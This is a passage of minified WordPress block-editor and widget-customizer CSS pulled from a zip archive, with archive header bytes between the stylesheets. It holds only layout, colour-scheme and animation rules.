:before{box-sizing:inherit}PK!1ȼ(dist/customize-widgets/style-rtl.min.cssnuȯ:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}#customize-theme-controls .customize-pane-child.accordion-section-content.customize-widgets-layout__inspector{background:#fff;box-sizing:border-box}#customize-theme-controls .customize-pane-child.accordion-section-content.customize-widgets-layout__inspector *{box-sizing:inherit}#customize-theme-controls .customize-pane-child.accordion-section-content.customize-widgets-layout__inspector .block-editor-block-inspector{margin:-12px}#customize-theme-controls .customize-pane-child.accordion-section-content.customize-widgets-layout__inspector .block-editor-block-inspector h3{margin-bottom:0}#customize-theme-controls .customize-pane-child.control-section-sidebar.is-sub-section-open{transform:translateX(100%)}@media (min-width:600px){.customize-widgets-header{margin-bottom:44px}}.customize-widgets-header.is-fixed-toolbar-active{margin-bottom:0}.customize-widgets-header{background:#f0f0f1;border-bottom:1px solid #e0e0e0;display:flex;justify-content:flex-end;margin:-15px -12px 0;z-index:8}.customize-widgets-header-toolbar{align-items:center;border:none;display:flex;width:100%}.customize-widgets-header-toolbar .customize-widgets-header-toolbar__inserter-toggle.components-button.has-icon{border-radius:2px;color:#fff;height:32px;margin:12px auto 12px 0;min-width:32px;padding:0}.customize-widgets-header-toolbar .customize-widgets-header-toolbar__inserter-toggle.components-button.has-icon:before{content:none}@media not (prefers-reduced-motion){.customize-widgets-header-toolbar .customize-widgets-header-toolbar__inserter-toggle.components-button.has-icon svg{transition:transform .2s cubic-bezier(.165,.84,.44,1)}}.customize-widgets-header-toolbar .customize-widgets-header-toolbar__inserter-toggle.components-button.has-icon.is-pressed{background:#1e1e1e}.customize-widgets-header-toolbar .customize-widgets-header-toolbar__inserter-toggle.components-button.has-icon.is-pressed svg{transform:rotate(-45deg)}.customize-widgets-header-toolbar .components-button.has-icon.customize-widgets-editor-history-button.redo-button{margin-right:-12px}#customize-sidebar-outer-content{min-width:100%;width:auto}#customize-outer-theme-controls .widgets-inserter{padding:0}#customize-outer-theme-controls .widgets-inserter .customize-section-description-container{display:none}.customize-widgets-layout__inserter-panel{background:#fff}.customize-widgets-layout__inserter-panel-header{align-items:center;border-bottom:1px solid #ddd;box-sizing:border-box;display:flex;height:46px;justify-content:space-between;padding:16px}.customize-widgets-layout__inserter-panel-header .customize-widgets-layout__inserter-panel-header-title{margin:0}.block-editor-inserter__quick-inserter .block-editor-inserter__panel-content{background:#fff}.customize-widgets-keyboard-shortcut-help-modal__section{margin:0 0 2rem}.customize-widgets-keyboard-shortcut-help-modal__section-title{font-size:.9rem;font-weight:600}.customize-widgets-keyboard-shortcut-help-modal__shortcut{align-items:baseline;border-top:1px solid #ddd;display:flex;margin-bottom:0;padding:.6rem 0}.customize-widgets-keyboard-shortcut-help-modal__shortcut:last-child{border-bottom:1px solid #ddd}.customize-widgets-keyboard-shortcut-help-modal__shortcut:empty{display:none}.customize-widgets-keyboard-shortcut-help-modal__shortcut-term{font-weight:600;margin:0 1rem 0 0;text-align:left}.customize-widgets-keyboard-shortcut-help-modal__shortcut-description{flex:1;margin:0}.customize-widgets-keyboard-shortcut-help-modal__shortcut-key-combination{background:none;display:block;margin:0;padding:0}.customize-widgets-keyboard-shortcut-help-modal__shortcut-key-combination+.customize-widgets-keyboard-shortcut-help-modal__shortcut-key-combination{margin-top:10px}.customize-widgets-keyboard-shortcut-help-modal__shortcut-key{border-radius:8%;margin:0 .2rem;padding:.25rem .5rem}.customize-widgets-keyboard-shortcut-help-modal__shortcut-key:last-child{margin:0 .2rem 0 0}.components-popover.more-menu-dropdown__content{z-index:99998}.customize-control-sidebar_block_editor .block-editor-block-list__block-popover{position:fixed!important;z-index:7}.customize-control-sidebar_block_editor .components-popover,.customize-widgets-popover .components-popover{position:fixed!important}.customize-widgets-welcome-guide__image__wrapper{background:#00a0d2;margin-bottom:8px;text-align:center}.customize-widgets-welcome-guide__image{height:auto}.wrap .customize-widgets-welcome-guide__heading{font-size:18px;font-weight:600}.customize-widgets-welcome-guide__text{line-height:1.7}.customize-widgets-welcome-guide__button{justify-content:center;margin:1em 0;width:100%}.customize-widgets-welcome-guide__separator{margin:1em 0}.customize-widgets-welcome-guide__more-info{line-height:1.4}#customize-theme-controls .customize-pane-child.customize-widgets__sidebar-section.open{overflow:unset}#customize-theme-controls .customize-pane-child.customize-widgets__sidebar-section{background-color:#fff;min-height:100%;padding-top:12px!important}#customize-theme-controls .customize-pane-child.customize-widgets__sidebar-section .customize-section-title{margin-top:-12px!important;position:static!important;width:unset!important}.components-modal__screen-overlay{z-index:999999}.customize-control-sidebar_block_editor,.customize-widgets-layout__inspector{box-sizing:border-box}.customize-control-sidebar_block_editor *,.customize-control-sidebar_block_editor :after,.customize-control-sidebar_block_editor :before,.customize-widgets-layout__inspector *,.customize-widgets-layout__inspector :after,.customize-widgets-layout__inspector :before{box-sizing:inherit}PK!BKvv!dist/block-editor/content.min.cssnuȯ:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.block-editor-block-icon{align-items:center;display:flex;height:24px;justify-content:center;width:24px}.block-editor-block-icon.has-colors svg{fill:currentColor}@media (forced-colors:active){.block-editor-block-icon.has-colors svg{fill:CanvasText}}.block-editor-block-icon svg{max-height:24px;max-width:24px;min-height:20px;min-width:20px}.block-editor-block-styles .block-editor-block-list__block{margin:0}@keyframes selection-overlay__fade-in-animation{0%{opacity:0}to{opacity:.4}}:root .block-editor-block-list__layout::selection,:root [data-has-multi-selection=true] .block-editor-block-list__layout::selection,_::-webkit-full-page-media,_:future{background-color:initial}.block-editor-block-list__layout{position:relative}.block-editor-block-list__layout .block-editor-block-list__block.is-multi-selected:not(.is-partially-selected) ::selection,.block-editor-block-list__layout .block-editor-block-list__block.is-multi-selected:not(.is-partially-selected)::selection{background:#0000}.block-editor-block-list__layout .block-editor-block-list__block.is-multi-selected:not(.is-partially-selected):after{background:var(--wp-admin-theme-color);bottom:0;content:"";left:0;opacity:.4;pointer-events:none;position:absolute;right:0;top:0;z-index:1}@media not (prefers-reduced-motion){.block-editor-block-list__layout .block-editor-block-list__block.is-multi-selected:not(.is-partially-selected):after{animation:selection-overlay__fade-in-animation .1s ease-out;animation-fill-mode:forwards}}.block-editor-block-list__layout .block-editor-block-list__block.is-multi-selected:not(.is-partially-selected):after{outline:2px solid #0000}.block-editor-block-list__layout .block-editor-block-list__block.is-multi-selected:not(.is-partially-selected).is-highlighted:after{outline-color:#0000}.block-editor-block-list__layout .block-editor-block-list__block.is-highlighted,.block-editor-block-list__layout .block-editor-block-list__block.is-highlighted~.is-multi-selected,.block-editor-block-list__layout .block-editor-block-list__block:not([contenteditable=true]):focus{outline:none}.block-editor-block-list__layout .block-editor-block-list__block.is-highlighted:after,.block-editor-block-list__layout .block-editor-block-list__block.is-highlighted~.is-multi-selected:after,.block-editor-block-list__layout .block-editor-block-list__block:not([contenteditable=true]):focus:after{bottom:0;content:"";left:0;outline-color:var(--wp-admin-theme-color);outline-offset:calc(var(--wp-admin-border-width-focus)*-1/var(--wp-block-editor-iframe-zoom-out-scale, 1));outline-style:solid;outline-width:calc(var(--wp-admin-border-width-focus)*1/var(--wp-block-editor-iframe-zoom-out-scale, 1));pointer-events:none;position:absolute;right:0;top:0;z-index:1}.block-editor-block-list__layout .block-editor-block-list__block.is-block-hidden{border:none!important;height:0;overflow:hidden;padding:0!important;visibility:hidden}.block-editor-block-list__layout.is-layout-flex:not(.is-vertical)>.is-block-hidden{align-self:stretch;height:auto;white-space:nowrap!important;width:0}.block-editor-block-list__layout [class^=components-]{-webkit-user-select:text;user-select:text}.block-editor-block-list__layout .block-editor-block-list__block{overflow-wrap:break-word;pointer-events:auto;position:relative}.block-editor-block-list__layout .block-editor-block-list__block.is-editing-disabled{pointer-events:none}.block-editor-block-list__layout .block-editor-block-list__block.has-negative-margin.has-child-selected,.block-editor-block-list__layout .block-editor-block-list__block.has-negative-margin.is-selected{z-index:20}.block-editor-block-list__layout .block-editor-block-list__block .reusable-block-edit-panel *{z-index:1}.block-editor-block-list__layout .block-editor-block-list__block .components-placeholder .components-with-notices-ui{margin:-10px 0 12px}.block-editor-block-list__layout .block-editor-block-list__block .components-with-notices-ui{margin:0 0 12px;width:100%}.block-editor-block-list__layout .block-editor-block-list__block .components-with-notices-ui .components-notice .components-notice__content{font-size:13px}.block-editor-block-list__layout .block-editor-block-list__block.has-warning{min-height:48px}.block-editor-block-list__layout .block-editor-block-list__block.has-warning>*{pointer-events:none;-webkit-user-select:none;user-select:none}.block-editor-block-list__layout .block-editor-block-list__block.has-warning .block-editor-warning{pointer-events:all}.block-editor-block-list__layout .block-editor-block-list__block.has-warning:after{background-color:#fff6;bottom:0;content:"";left:0;position:absolute;right:0;top:0}.block-editor-block-list__layout .block-editor-block-list__block.has-warning.is-multi-selected:after{background-color:initial}.block-editor-block-list__layout .block-editor-block-list__block.is-reusable.has-child-selected:after{box-shadow:0 0 0 1px var(--wp-admin-theme-color)}.block-editor-block-list__layout .block-editor-block-list__block[data-clear=true]{float:none}.block-editor-block-list__layout .block-editor-block-list__block:not([data-draggable=true]),.block-editor-block-list__layout .block-editor-block-list__block:not([draggable=true]){cursor:default}.block-editor-block-list__layout .block-editor-block-list__block[data-draggable=true],.block-editor-block-list__layout .block-editor-block-list__block[draggable=true]{cursor:grab}.block-editor-block-list__layout .block-editor-block-list__block.is-multi-selected{cursor:default}.block-editor-block-list__layout .block-editor-block-list__block [contenteditable],.block-editor-block-list__layout .block-editor-block-list__block[contenteditable]{cursor:text}.is-outline-mode .block-editor-block-list__block:not(.remove-outline).is-hovered:not(.is-selected):after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline):not(.rich-text):not([contenteditable=true]).is-selected:after{bottom:0;content:"";left:0;outline-color:var(--wp-admin-theme-color);outline-offset:calc(var(--wp-admin-border-width-focus)*-1/var(--wp-block-editor-iframe-zoom-out-scale, 1));outline-style:solid;outline-width:calc(var(--wp-admin-border-width-focus)*1/var(--wp-block-editor-iframe-zoom-out-scale, 1));pointer-events:none;position:absolute;right:0;top:0}.is-outline-mode .block-editor-block-list__block:not(.remove-outline).is-reusable.block-editor-block-list__block:not([contenteditable]):focus:after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline).is-reusable.is-highlighted:after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline).is-reusable.is-hovered:after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline).is-reusable.is-selected:after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline).wp-block-template-part.block-editor-block-list__block:not([contenteditable]):focus:after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline).wp-block-template-part.is-highlighted:after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline).wp-block-template-part.is-hovered:after,.is-outline-mode .block-editor-block-list__block:not(.remove-outline).wp-block-template-part.is-selected:after{outline-color:var(--wp-block-synced-color)}@keyframes block-editor-is-editable__animation{0%{background-color:rgba(var(--wp-admin-theme-color--rgb),.1)}to{background-color:rgba(var(--wp-admin-theme-color--rgb),0)}}@keyframes block-editor-is-editable__animation_reduce-motion{0%{background-color:rgba(var(--wp-admin-theme-color--rgb),.1)}99%{background-color:rgba(var(--wp-admin-theme-color--rgb),.1)}to{background-color:rgba(var(--wp-admin-theme-color--rgb),0)}}.is-root-container:not([inert]) .block-editor-block-list__block.is-selected .block-editor-block-list__block.has-editable-outline:after{animation-delay:.1s;animation-duration:.8s;animation-fill-mode:backwards;animation-name:block-editor-is-editable__animation;animation-timing-function:ease-out;bottom:0;content:"";left:0;pointer-events:none;position:absolute;right:0;top:0}@media (prefers-reduced-motion:reduce){.is-root-container:not([inert]) .block-editor-block-list__block.is-selected .block-editor-block-list__block.has-editable-outline:after{animation-delay:0s;animation-name:block-editor-is-editable__animation_reduce-motion}}.is-focus-mode .block-editor-block-list__block:not(.has-child-selected){opacity:.2}@media not (prefers-reduced-motion){.is-focus-mode .block-editor-block-list__block:not(.has-child-selected){transition:opacity .1s linear}}.is-focus-mode .block-editor-block-list__block.is-content-locked-temporarily-editing-as-blocks.has-child-selected,.is-focus-mode .block-editor-block-list__block.is-content-locked-temporarily-editing-as-blocks.has-child-selected .block-editor-block-list__block,.is-focus-mode .block-editor-block-list__block.is-content-locked.has-child-selected,.is-focus-mode .block-editor-block-list__block.is-content-locked.has-child-selected .block-editor-block-list__block,.is-focus-mode .block-editor-block-list__block:not(.has-child-selected) .block-editor-block-list__block,.is-focus-mode .block-editor-block-list__block:not(.has-child-selected).is-multi-selected,.is-focus-mode .block-editor-block-list__block:not(.has-child-selected).is-selected{opacity:1}.wp-block.alignleft,.wp-block.alignright,.wp-block[data-align=left]>*,.wp-block[data-align=right]>*{z-index:21}.wp-site-blocks>[data-align=left]{float:left;margin-right:2em}.wp-site-blocks>[data-align=right]{float:right;margin-left:2em}.wp-site-blocks>[data-align=center]{justify-content:center;margin-left:auto;margin-right:auto}.block-editor-block-list .block-editor-inserter{cursor:move;cursor:grab;margin:8px}@keyframes block-editor-inserter__toggle__fade-in-animation{0%{opacity:0}to{opacity:1}}@media not (prefers-reduced-motion){.wp-block .block-list-appender .block-editor-inserter__toggle{animation:block-editor-inserter__toggle__fade-in-animation .1s ease;animation-fill-mode:forwards}}.block-editor-block-list__block:not(.is-selected):not(.has-child-selected) .block-editor-default-block-appender{display:none}.block-editor-block-list__block:not(.is-selected):not(.has-child-selected) .block-editor-default-block-appender .block-editor-inserter__toggle{opacity:0;transform:scale(0)}.block-editor-block-list__block .block-editor-block-list__block-html-textarea{border:none;border-radius:2px;box-shadow:inset 0 0 0 1px #1e1e1e;box-sizing:border-box;display:block;font-family:Menlo,Consolas,monaco,monospace;font-size:15px;line-height:1.5;margin:0;outline:none;overflow:hidden;padding:12px;resize:none;width:100%}@media not (prefers-reduced-motion){.block-editor-block-list__block .block-editor-block-list__block-html-textarea{transition:padding .2s linear}}.block-editor-block-list__block .block-editor-block-list__block-html-textarea:focus{box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color)}.block-editor-block-list__block .block-editor-warning{position:relative;z-index:5}.block-editor-block-list__block .block-editor-warning.block-editor-block-list__block-crash-warning{margin-bottom:auto}.block-editor-block-list__zoom-out-separator{background:#ddd;margin-left:-1px;margin-right:-1px}@media not (prefers-reduced-motion){.block-editor-block-list__zoom-out-separator{transition:background-color .3s ease}}.block-editor-block-list__zoom-out-separator{align-items:center;color:#000;display:flex;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:400;justify-content:center;overflow:hidden}.is-zoomed-out .block-editor-block-list__zoom-out-separator{font-size:calc(13px/var(--wp-block-editor-iframe-zoom-out-scale))}.block-editor-block-list__zoom-out-separator.is-dragged-over{background:#ccc}.block-editor-block-list__layout.is-root-container.has-global-padding>.block-editor-block-list__zoom-out-separator,.has-global-padding>.block-editor-block-list__zoom-out-separator{margin:0 calc(var(--wp--style--root--padding-right)*-1 - 1px) 0 calc(var(--wp--style--root--padding-left)*-1 - 1px)!important;max-width:none}.is-dragging{cursor:grabbing}.is-vertical .block-list-appender{margin-left:12px;margin-right:auto;margin-top:12px;width:24px}.block-list-appender>.block-editor-inserter{display:block}.block-editor-block-list__block:not(.is-selected):not(.has-child-selected):not(.block-editor-block-list__layout) .block-editor-block-list__layout>.block-list-appender .block-list-appender__toggle{opacity:0;transform:scale(0)}.block-editor-block-list__block.has-block-overlay{cursor:default}.block-editor-block-list__block.has-block-overlay .block-editor-block-list__block{pointer-events:none}.block-editor-block-list__block.has-block-overlay .block-editor-block-list__block.has-block-overlay:before{left:0;right:0;width:auto}.block-editor-block-list__layout .is-dragging{opacity:.1}.block-editor-block-list__layout .is-dragging iframe{pointer-events:none}.block-editor-block-list__layout .is-dragging::selection{background:#0000!important}.block-editor-block-list__layout .is-dragging:after{content:none!important}.wp-block img:not([draggable]),.wp-block svg:not([draggable]){pointer-events:none}.block-editor-block-preview__content-iframe .block-list-appender{display:none}.block-editor-block-preview__live-content *{pointer-events:none}.block-editor-block-preview__live-content .block-list-appender{display:none}.block-editor-block-preview__live-content .components-button:disabled{opacity:1}.block-editor-block-preview__live-content .block-editor-block-list__block[data-empty=true],.block-editor-block-preview__live-content .components-placeholder{display:none}.block-editor-block-variation-picker__skip,.block-editor-block-variation-picker__variations,.wp-block-group-placeholder__variations{display:flex;flex-direction:row;flex-wrap:wrap;font-size:12px;gap:8px;justify-content:flex-start;list-style:none;margin:0;padding:0;width:100%}.block-editor-block-variation-picker__skip svg,.block-editor-block-variation-picker__variations svg,.wp-block-group-placeholder__variations svg{fill:#949494!important}.block-editor-block-variation-picker__skip .components-button,.block-editor-block-variation-picker__variations .components-button,.wp-block-group-placeholder__variations .components-button{padding:4px}.block-editor-block-variation-picker__skip .components-button:hover,.block-editor-block-variation-picker__variations .components-button:hover,.wp-block-group-placeholder__variations .components-button:hover{background:none!important}.block-editor-block-variation-picker__skip .components-button:hover svg,.block-editor-block-variation-picker__variations .components-button:hover svg,.wp-block-group-placeholder__variations .components-button:hover svg{fill:var(--wp-admin-theme-color)!important}.block-editor-block-variation-picker__skip>li,.block-editor-block-variation-picker__variations>li,.wp-block-group-placeholder__variations>li{align-items:center;display:flex;flex-direction:column;gap:4px;width:auto}.block-editor-button-block-appender{align-items:center;box-shadow:inset 0 0 0 1px #1e1e1e;color:#1e1e1e;display:flex;flex-direction:column;height:auto;justify-content:center;width:100%}.is-dark-theme .block-editor-button-block-appender{box-shadow:inset 0 0 0 1px #ffffffa6;color:#ffffffa6}.block-editor-button-block-appender:hover{box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color);color:var(--wp-admin-theme-color)}.block-editor-button-block-appender:focus{box-shadow:inset 0 0 0 2px var(--wp-admin-theme-color)}.block-editor-button-block-appender:active{color:#000}.block-editor-block-list__block:not(.is-selected)>.is-layout-constrained.wp-block-group__inner-container>.block-list-appender:only-child,.block-editor-block-list__block:not(.is-selected)>.is-layout-flow.wp-block-group__inner-container>.block-list-appender:only-child,.is-layout-constrained.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child,.is-layout-flow.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child{pointer-events:none}.block-editor-block-list__block:not(.is-selected)>.is-layout-constrained.wp-block-group__inner-container>.block-list-appender:only-child:after,.block-editor-block-list__block:not(.is-selected)>.is-layout-flow.wp-block-group__inner-container>.block-list-appender:only-child:after,.is-layout-constrained.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child:after,.is-layout-flow.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child:after{border:1px dashed;bottom:0;content:"";left:0;pointer-events:none;position:absolute;right:0;top:0}.block-editor-block-list__block:not(.is-selected)>.is-layout-constrained.wp-block-group__inner-container>.block-list-appender:only-child .block-editor-inserter,.block-editor-block-list__block:not(.is-selected)>.is-layout-flow.wp-block-group__inner-container>.block-list-appender:only-child .block-editor-inserter,.is-layout-constrained.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child .block-editor-inserter,.is-layout-flow.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child .block-editor-inserter{opacity:0}.block-editor-block-list__block:not(.is-selected)>.is-layout-constrained.wp-block-group__inner-container>.block-list-appender:only-child .block-editor-inserter:focus-within,.block-editor-block-list__block:not(.is-selected)>.is-layout-flow.wp-block-group__inner-container>.block-list-appender:only-child .block-editor-inserter:focus-within,.is-layout-constrained.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child .block-editor-inserter:focus-within,.is-layout-flow.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child .block-editor-inserter:focus-within{opacity:1}.block-editor-block-list__block:not(.is-selected)>.is-layout-constrained.wp-block-group__inner-container>.block-list-appender:only-child.is-drag-over:after,.block-editor-block-list__block:not(.is-selected)>.is-layout-flow.wp-block-group__inner-container>.block-list-appender:only-child.is-drag-over:after,.is-layout-constrained.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child.is-drag-over:after,.is-layout-flow.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child.is-drag-over:after{border:none}.block-editor-block-list__block:not(.is-selected)>.is-layout-constrained.wp-block-group__inner-container>.block-list-appender:only-child.is-drag-over .block-editor-inserter,.block-editor-block-list__block:not(.is-selected)>.is-layout-flow.wp-block-group__inner-container>.block-list-appender:only-child.is-drag-over .block-editor-inserter,.is-layout-constrained.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child.is-drag-over .block-editor-inserter,.is-layout-flow.block-editor-block-list__block:not(.is-selected)>.block-list-appender:only-child.is-drag-over .block-editor-inserter{visibility:visible}.block-editor-block-list__block:not(.is-selected)>.block-editor-block-list__block>.block-list-appender:only-child:after{border:none}.block-list-appender:only-child.is-drag-over .block-editor-button-block-appender{background-color:var(--wp-admin-theme-color);box-shadow:inset 0 0 0 1px #ffffffa6;color:#ffffffa6}@media not (prefers-reduced-motion){.block-list-appender:only-child.is-drag-over .block-editor-button-block-appender{transition:background-color .2s ease-in-out}}.block-editor-default-block-appender{clear:both;margin-left:auto;margin-right:auto;position:relative}.block-editor-default-block-appender[data-root-client-id=""] .block-editor-default-block-appender__content:hover{outline:1px solid #0000}.block-editor-default-block-appender .block-editor-default-block-appender__content{margin-block-end:0;margin-block-start:0;opacity:.62}.block-editor-default-block-appender .components-drop-zone__content-icon{display:none}.block-editor-default-block-appender .block-editor-inserter__toggle.components-button.has-icon{background:#1e1e1e;color:#fff;height:24px;min-width:24px;padding:0}.block-editor-default-block-appender .block-editor-inserter__toggle.components-button.has-icon:hover{background:var(--wp-admin-theme-color);color:#fff}.block-editor-default-block-appender .block-editor-inserter{line-height:0;position:absolute;right:0;top:0}.block-editor-default-block-appender .block-editor-inserter:disabled{display:none}.block-editor-block-list__block .block-list-appender{bottom:0;list-style:none;padding:0;position:absolute;right:0;z-index:2}.block-editor-block-list__block .block-list-appender.block-list-appender{line-height:0;margin:0}.block-editor-block-list__block .block-list-appender .block-editor-inserter:disabled{display:none}.block-editor-block-list__block .block-list-appender .block-editor-default-block-appender{height:24px}.block-editor-block-list__block .block-list-appender .block-editor-inserter__toggle.components-button.has-icon,.block-editor-block-list__block .block-list-appender .block-list-appender__toggle{background:#1e1e1e;box-shadow:none;color:#fff;display:none;flex-direction:row;height:24px;min-width:24px;padding:0!important;width:24px}.block-editor-block-list__block .block-list-appender .block-editor-inserter__toggle.components-button.has-icon:hover,.block-editor-block-list__block .block-list-appender .block-list-appender__toggle:hover{background:var(--wp-admin-theme-color);color:#fff}.block-editor-block-list__block .block-list-appender .block-editor-default-block-appender__content{display:none}.block-editor-block-list__block .block-list-appender:only-child{align-self:center;line-height:inherit;list-style:none;position:relative;right:auto}.block-editor-block-list__block .block-list-appender:only-child .block-editor-default-block-appender__content{display:block}.block-editor-block-list__block.is-selected .block-editor-block-list__layout>.block-list-appender .block-editor-inserter__toggle.components-button.has-icon,.block-editor-block-list__block.is-selected .block-editor-block-list__layout>.block-list-appender .block-list-appender__toggle,.block-editor-block-list__block.is-selected>.block-list-appender .block-editor-inserter__toggle.components-button.has-icon,.block-editor-block-list__block.is-selected>.block-list-appender .block-list-appender__toggle{display:flex}.block-editor-default-block-appender__content{cursor:text}.block-editor-iframe__body{position:relative}.block-editor-iframe__html{transform-origin:top center}@media not (prefers-reduced-motion){.block-editor-iframe__html{transition:background-color .4s}}.block-editor-iframe__html.zoom-out-animation{bottom:0;left:0;overflow-y:var(--wp-block-editor-iframe-zoom-out-overflow-behavior,scroll);position:fixed;right:0;top:calc(var(--wp-block-editor-iframe-zoom-out-scroll-top, 0)*-1)}.block-editor-iframe__html.is-zoomed-out{background-color:var(--wp-editor-canvas-background);margin-bottom:calc(var(--wp-block-editor-iframe-zoom-out-content-height)*(1 - var(--wp-block-editor-iframe-zoom-out-scale, 1))*-1 + var(--wp-block-editor-iframe-zoom-out-frame-size, 0)*2/var(--wp-block-editor-iframe-zoom-out-scale, 1)*-1 + -2px);padding-bottom:calc(var(--wp-block-editor-iframe-zoom-out-frame-size, 0)/var(--wp-block-editor-iframe-zoom-out-scale, 1));padding-top:calc(var(--wp-block-editor-iframe-zoom-out-frame-size, 0)/var(--wp-block-editor-iframe-zoom-out-scale, 1));scale:var(--wp-block-editor-iframe-zoom-out-scale,1);transform:translateX(calc((var(--wp-block-editor-iframe-zoom-out-scale-container-width) - var(--wp-block-editor-iframe-zoom-out-container-width, 100vw))/2/var(--wp-block-editor-iframe-zoom-out-scale, 1)))}.block-editor-iframe__html.is-zoomed-out body{min-height:calc((var(--wp-block-editor-iframe-zoom-out-inner-height) - 2*var(--wp-block-editor-iframe-zoom-out-frame-size, 0)/var(--wp-block-editor-iframe-zoom-out-scale, 1))/var(--wp-block-editor-iframe-zoom-out-scale, 1))}.block-editor-iframe__html.is-zoomed-out body>.is-root-container:not(.wp-block-post-content){display:flex;flex:1;flex-direction:column;height:100%}.block-editor-iframe__html.is-zoomed-out body>.is-root-container:not(.wp-block-post-content)>main{flex:1}.block-editor-iframe__html.is-zoomed-out .wp-block[draggable]{cursor:grab}.block-editor-media-placeholder__cancel-button.is-link{display:block;margin:1em}.block-editor-media-placeholder.is-appender{min-height:0}.block-editor-media-placeholder.is-appender:hover{box-shadow:0 0 0 1px var(--wp-admin-theme-color);cursor:pointer}.block-editor-plain-text{border:none;box-shadow:none;color:inherit;font-family:inherit;font-size:inherit;line-height:inherit;margin:0;padding:0;width:100%}.rich-text [data-rich-text-placeholder]{pointer-events:none}.rich-text [data-rich-text-placeholder]:after{content:attr(data-rich-text-placeholder);opacity:.62}.rich-text:focus{outline:none}figcaption.block-editor-rich-text__editable [data-rich-text-placeholder]:before{opacity:.8}[data-rich-text-script]{display:inline}[data-rich-text-script]:before{background:#ff0;content:""}[data-rich-text-comment],[data-rich-text-format-boundary]{border-radius:2px}[data-rich-text-comment]{background-color:currentColor}[data-rich-text-comment] span{color:currentColor;filter:invert(100%);padding:0 2px}.rich-text [contenteditable=false]::selection{background-color:initial}.block-editor-warning{align-items:center;background-color:#fff;border:1px solid #1e1e1e;border-radius:2px;display:flex;flex-wrap:wrap;padding:1em}.block-editor-warning,.block-editor-warning .block-editor-warning__message{font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif}.block-editor-warning .block-editor-warning__message{color:#1e1e1e;font-size:13px;line-height:1.4;margin:0}.block-editor-warning p.block-editor-warning__message.block-editor-warning__message{min-height:auto}.block-editor-warning .block-editor-warning__contents{align-items:baseline;display:flex;flex-direction:row;flex-wrap:wrap;gap:12px;justify-content:space-between;width:100%}.block-editor-warning .block-editor-warning__actions{align-items:center;display:flex;gap:8px}.components-popover.block-editor-warning__dropdown{z-index:99998}body.admin-color-light{--wp-admin-theme-color:#0085ba;--wp-admin-theme-color--rgb:0,133,186;--wp-admin-theme-color-darker-10:#0073a1;--wp-admin-theme-color-darker-10--rgb:0,114.7661290323,160.5;--wp-admin-theme-color-darker-20:#006187;--wp-admin-theme-color-darker-20--rgb:0,96.5322580645,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-light{--wp-admin-border-width-focus:1.5px}}body.admin-color-modern{--wp-admin-theme-color:#3858e9;--wp-admin-theme-color--rgb:56,88,233;--wp-admin-theme-color-darker-10:#2145e6;--wp-admin-theme-color-darker-10--rgb:33.0384615385,68.7307692308,230.4615384615;--wp-admin-theme-color-darker-20:#183ad6;--wp-admin-theme-color-darker-20--rgb:23.6923076923,58.1538461538,214.3076923077;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-modern{--wp-admin-border-width-focus:1.5px}}body.admin-color-blue{--wp-admin-theme-color:#096484;--wp-admin-theme-color--rgb:9,100,132;--wp-admin-theme-color-darker-10:#07526c;--wp-admin-theme-color-darker-10--rgb:7.3723404255,81.914893617,108.1276595745;--wp-admin-theme-color-darker-20:#064054;--wp-admin-theme-color-darker-20--rgb:5.7446808511,63.829787234,84.2553191489;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){body.admin-color-blue{--wp-admin-border-width-focus:1.5px}}body.admin-color-coffee{--wp-admin-theme-color:#46403c;--wp-admin-theme-color--rgb:70,64,60;--wp-admin-theme-color-darker-10:#383330;--wp-admin-theme-color-darker-10--rgb:56.2692307692,51.4461538462,48.2307692308;--wp-admin-theme-color-darker-20:#2b2724;--wp-admin-theme-color-darker-20--rgb:42.5384615385,38.8923076923,36.4615384615;--wp-admin-border-width-focus:2px}@media 